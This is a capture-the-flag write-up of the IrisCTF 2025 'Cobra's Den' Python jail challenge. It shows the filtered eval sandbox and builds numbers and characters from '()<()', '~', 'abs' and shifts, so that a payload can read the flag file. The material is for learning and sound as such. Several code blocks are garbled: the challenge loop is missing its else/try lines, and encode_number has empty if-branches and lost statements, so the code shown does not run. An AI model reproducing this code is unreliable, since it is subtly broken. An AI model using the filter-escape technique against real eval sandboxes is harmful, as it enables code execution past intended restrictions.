Cobra’s Den was a python jail escape challenge for IrisCTF 2025. What better way to start the new year than with a pyjail?

Lets take a look at the code

# flag stored at 'flag' in current dir
import builtins

all_builtins = dir(builtins)
filtered_builtins = {name: getattr(builtins, name) for name in all_builtins if len(name) <= 4}
filtered_builtins.update({'print': print})

whitelist = "<ph[(cobras.den)]+~"
security_check = lambda s: any(c not in whitelist for c in s) or len(s) > 1115 or s.count('.') > 1

print('Good luck!')
while True:
    cmd = input("Input: ")
    if security_check(cmd):
        print("No dice!")
            eval(f"print({cmd})", {"__builtins__": filtered_builtins})
        except SyntaxError as e:
            print(f"Syntax error: {e}")
        except Exception as e:
            print(f"An error occurred: {e}")

The whitelist is quite restrictive, we can only use the characters from <ph[(cobras.den)]+~ and we have to stay under 1115 characters. We are told the flag is located in flag at the current directory and give the characters we have we can call open() and read(), but encoding flag will be a challenge. Let’s see how we can use the characters we are given to encode flag

Getting characters without characters

First, we can do comparisons on empty tuples which gets us True and False. In python, True is equal to 1 and False is equal to 0. We can use these to encode numbers and then use chr() to encode flag. Unfortunetly we cannot use the equals sign to do:

>>> ()==()

But we can use > which lets us do:

>>> ()>()

We can use ~ the bitwise NOT operator to get -1

>>> ~(()>())

And since we also can use + we can add -1 to itself to get -2 and bitwise NOT to get 1

>>> ~(~(()>())+~(()>()))

Unfortunetly if we try to build out the digits 1-9 this way, we run into the character limit as the strings get very lengthy. Looking at the built in functions we could use, I saw abs(), and using that we can get 1 by doing:

>>> abs(~(()<()))

Now we can build out the numbers 1 - 9:

def encode_digit(number: int):
    if number == 0:
        return """()<()"""
    if number == 1:
        return """abs(~(()<()))""" 
    if number == 2:
        return """abs(~(()<())+~(()<()))"""
    if number == 3:
        return """abs(~(()<())+~(()<())+~(()<()))"""
    if number == 4:
        return """abs(~(()<())<<abs(~(()<())+~(()<())))"""
    if number == 5:
        return """abs((~(()<())<<abs(~(()<())+~(()<())))+~(()<()))"""
    if number == 6:
        return """abs((~(()<())<<abs(~(()<())+~(()<())))+~(()<())+~(()<()))"""
    if number == 7:
        return """abs(~(()<())<<abs(~(()<())+~(()<())+~(()<())))+~(()<())"""
    if number == 8:
        return """abs(~(()<())<<abs(~(()<())+~(()<())+~(()<())))"""
    if number == 9:
        return """abs((~(()<())<<abs(~(()<())+~(()<())+~(()<())))+~(()<()))"""

From there we can encode any number:

def encode_number(number: int):
    if number < 10:
        return encode_digit(number)
    shifts = []
    current = number
    shift_val = 0
    while current > 0:
        if current & 1:  
        current >>= 1  
        shift_val += 1
    txt = ""
    for shift in shifts:
        if txt:
            txt += "+"
        if shift == 0:
            txt += encode_number(1)
            txt += "(" + encode_number(1) + "<<" + encode_number(shift) + ")"
    return txt

And then any text:

def encode_text(text: str):
    result = ""
    for ch in map(ord, text):
        result += "chr(" + encode_number(ch) + ")+"
    return result

Gettin us our final payload of just over 850 chars, well under the limit

